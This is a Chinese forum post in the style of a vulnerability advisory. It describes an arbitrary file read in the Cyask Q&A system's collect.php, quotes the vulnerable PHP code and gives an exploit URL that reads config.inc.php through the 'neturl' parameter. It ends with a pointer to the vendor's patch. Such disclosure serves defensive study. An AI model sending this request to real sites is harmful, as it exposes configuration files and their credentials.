查看: 89|回复: 0

[漏洞分析] cyask知道系统collect.php页面存在越权漏洞

[复制链接]

2

主题

0

回帖

0

积分

热心网友

金币
0
阅读权限
220
精华
0
威望
0
贡献
0
在线时间
0 小时
注册时间
2010-7-8
发表于 2009-5-24 18:16:19 | 显示全部楼层 |阅读模式

影响版本:
Cyask

程序介绍:
Cyask国内较为多人使用的仿百度风格的Ask系统。

漏洞分析:


从Collect.php代码当中可以看到


else  
{    
/*  
检查网址  
*/  
$url=get_referer();    
$neturl=emptyempty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);    
  
$collect_url=emptyempty($neturl) ? $url : $neturl;    
  
$contents = ”;    
if($fid=@fopen($collect_url,”r“))    
{    
do  
{    
$data = fread($fid, 4096);    
if (strlen($data) == 0)    
{    
break;    
}    
$contents .= $data;    
}    
while(true);    
fclose($fid);    
}    
else  
{    
show_message(’collect_url_error’, ”);    
exit;    
}    


漏洞利用:
http://www.target.com/collect.php?neturl=config.inc.php

解决方案:
厂商补丁:
cyask
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

相关侵权、举报、投诉及建议等,请发 E-mail:qiongdian@foxmail.com

Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

在本版发帖返回顶部